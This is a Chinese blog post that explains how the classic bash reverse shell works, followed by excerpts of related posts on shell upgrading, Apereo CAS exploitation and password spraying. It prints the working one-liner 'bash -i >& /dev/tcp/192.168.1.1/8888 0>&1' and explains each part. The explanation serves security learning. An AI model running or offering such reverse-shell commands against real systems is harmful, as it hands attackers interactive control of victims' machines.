分析bash反弹shell的原理

一颗小胡椒2021-07-19 22:08:04

反弹shell的原理分析

bash -i >& /dev/tcp/192.168.1.1/8888 0>&1

代码片段:可切换语言,无法单独设置文字格式

这个经典反弹shell,我们从原理,命令拆解来解析。

原理

反弹shell是由攻击者无法连接受害者而进行一种操作,可能目标是局域网内主机,或者开启防火墙的某些策略等情况,我们就可以让受害者主动向攻击者发起连接,被控端发起请求到控制端某端口,并将其命令行的输入输出转到控制端,从而实现交互。

命令拆解

bash

Linux中一般默认的shell是bash,它功能几乎可以涵盖shell所具有的功能,所以一般的shell脚本都会指定它为执行路径

常用的shell有 ash、bash、dash,不同的shell都有自己的特点以及用途

bash -i 打开一个交互shell,如果shell含有-i参数,即为交互式。交互式的意思是可以和用户进行交互,输入命令,回显给用户就是一个交互的过程,而执行一个shell脚本往往是非交互的

如何确认目前的shell是不是交互的,通过echo $-,查看返回的值可以知道。如果带有i参数即为交互式

    他们之间就是有无I参数的确别。至于其他参数标示什么意思,就不在本次文章范围内。

/dev目录

dev是设备(device)的英文缩写。这里主要存放与设备有关的文件。

 /dev/tcp/是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还有/dev/udp/

/dev/tcp/192.168.1.1/8888

代码片段:可切换语言,无法单独设置文字格式

所以上述命令就是和192.168.1.1:8888建立TCP连接

文件标识符

Linux 系统中,把一切都看做是文件,当进程打开现有文件或创建新文件时,内核向进程返回一个文件描述符,文件描述符就是内核为了高效管理已被打开的文件所创建的索引,用来指向被打开的文件。

所有执行I/O操作的系统调用都会通过文件描述符,即文件描述符可控制输入输出(输入/输出重定向)

标准输入(stdin):代码为0,使用< 或<< ,默认设备键盘
标准输出(stdout):代码为1.使用>或>> 默认设备显示器
标准错误输出(stderr):代码为2,使用2>或2>>,默认设备显示器

代码片段:可切换语言,无法单独设置文字格式

shell输入\输出重定向

使用1>将输出结果写入到指定文件中,文件不存在则创建文件,文件如果存在会覆盖原文件内容

省略不写则默认就是1,同理,输入重定向0< ,省略不写则默认就是 0

shellbash
本作品采用《CC 协议》,转载必须注明作者和本文链接
初识Shell
2022-03-11 22:42:44
程序是由序列组成的,告诉计算机如何完成一个具体的任务。编写程序花费的时间往往是实际运行时间的几十倍或几百倍。除了计算机生产厂家的专业人员外,绝大多数的 程序员已经不再去学习机器语言了。包含的功能几乎可以涵盖Shell所具有的功能,所以一般的Shell脚本都会指定它为执行路径。目前使用的 并不多,已经被/bin/tcsh所取代。
# 此时攻击机已经获取到了bash$ python -c 'import pty; pty.spawn'$ ctrl + z //快捷键。$ fg$ reset //这一步我实测有问题,输了会出问题,不输也没有影响,所以如果输了有问题可以不输。低权限提权首先是信息收集,看一下/proc/version和/etc/*-release,然后在google和Exploit Databas
0x01 Apereo cas简介Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service,是一个单点登录协议,Apereo CAS是实现该协议的软件包。Apereo CAS 4.1.X~4.1.6 默认密钥Apereo CAS 4.1.7~4.2.X KEY随机生成0x03漏洞利用与复现Webflow中使用了默认密钥changeit,所以我们就可以利用默认密钥生成序列化对象。
本文记录从零开始搭建F5 BIG-IP漏洞调试环境的细节。
验证子域邮箱名Invoke-DomainHarvestOWA-ExchHostname -Domain -UserList .\userName.txt -OutFile sprayed-ews-creds.txt. Office 365近源渗透物理渗透、物理攻击、近源渗透,这几个的意思都是在接近目标进行安全测试。Wi-Fi网线没有终端准入控制,直接插网线 DHCP 获取 IP。Bad USBBlack Hat 上提出 Bad USB。社会工程学在信息收集过程中就开始。钓鱼本质是利用人的信任。Windows 主机FTP服务端开启 FTP 服务。使用 certutil 下载的文件会原封不动在?目录下保存一份,文件名位随机字符,使用 delete 可以删除刚下载的缓存。
从Heartbleed到Apache Struts再到SolarWinds,这些是过去10年来发生的分水岭式的网络安全事件。严重的漏洞、广泛的网络攻击已经改变了网络安全的许多方面。为了回顾过去10年发生的安全事件,网络安全供应商Trustwave公司日前发表了一篇名为《十年回顾:漏洞状态》的博客文章,其中列出了过去10年中最突出和最值得注意的10个网络安全问题和违规行为。
AFL--模糊测试使用浅析
靶场Kioptrix Level 1攻略
2022-04-21 13:47:27
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
刚入行时在网上搜各种工具使用技巧及方法,通过别人的经验提高自身的技巧,然后再拿个小本本记录,这是每个网安人初入行时的必备姿势,那么今天丹丹就拿起先前做过的笔记和网上别人的经验做一个合集,把大部分使用到的工具技巧整理成册,后续自己以及大家查阅,如总结不到位的地方希望海涵,那现在就开始吧。。。。。
一颗小胡椒
暂无描述